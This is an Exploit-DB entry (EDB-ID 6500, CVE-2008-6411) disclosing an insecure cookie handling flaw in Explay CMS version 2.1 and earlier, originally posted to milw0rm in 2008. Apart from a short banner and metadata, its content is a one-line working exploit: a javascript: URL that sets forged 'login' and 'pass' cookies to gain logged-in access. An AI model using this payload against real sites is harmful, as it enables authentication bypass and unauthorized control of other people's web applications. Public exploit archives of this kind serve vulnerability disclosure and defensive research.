Explay CMS <= 2.1 Insecure Cookie Handling Vulnerability

2008-09-20T00:00:00
ID EDB-ID:6500
Type exploitdb
Reporter Stack
Modified 2008-09-20T00:00:00

Description

Explay CMS <= 2.1 Insecure Cookie Handling Vulnerability. CVE-2008-6411. Webapps exploit for php platform

                                        
                                            ###############################################################################################
[+] Explay CMS &lt;= 2.1 Insecure Cookie Handling Vulnerability
[+] Discovered By Stack                
[+] Greetz : All my freind               
################################################################################################
---
exploit:
javascript:document.cookie = "login=1; path=/"; document.cookie = "pass=1; path=/";

# milw0rm.com [2008-09-20]